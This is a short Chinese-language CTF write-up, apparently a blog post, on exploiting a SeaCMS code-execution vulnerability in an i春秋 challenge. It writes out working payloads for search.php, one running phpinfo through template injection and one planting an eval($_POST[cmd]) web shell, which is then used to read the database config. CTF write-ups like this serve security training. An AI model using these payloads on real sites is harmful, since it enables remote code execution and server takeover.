zoukankan      html  css  js  c++  java
  • i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)

    打开发现是海洋cms,那就搜索相关漏洞

    找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49

    直接利用其中给出的poc

    /search.php

    searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

    可以执行系统命令

    没找到flag,考虑可能在数据库中,想上传一句话,然后用菜刀查数据库来着,但是没有写文件的权限,手动查数据库感觉太麻烦,所以换个exp

    海洋cms v6.28命令执行漏洞 : https://www.uedbox.com/seacms-v628-0day/

    /search.php?searchtype=5&tid=&area=eval($_POST[cmd])

    菜刀直接连接

    找了好久终于找到数据库配置文件

    编辑该条shell配置如下

    最后得到flag

  • 相关阅读:
    web测试方法总结
    APP测试点总结
    函数初识
    字符编码及文件操作
    简单购物车程序(Python)
    基本数据类型(列表,元祖,字典,集合)
    python基础
    基本数据类型(数字和字符串)
    Python入门
    操作系统
  • 原文地址:https://www.cnblogs.com/leixiao-/p/9786034.html
Copyright © 2011-2022 走看看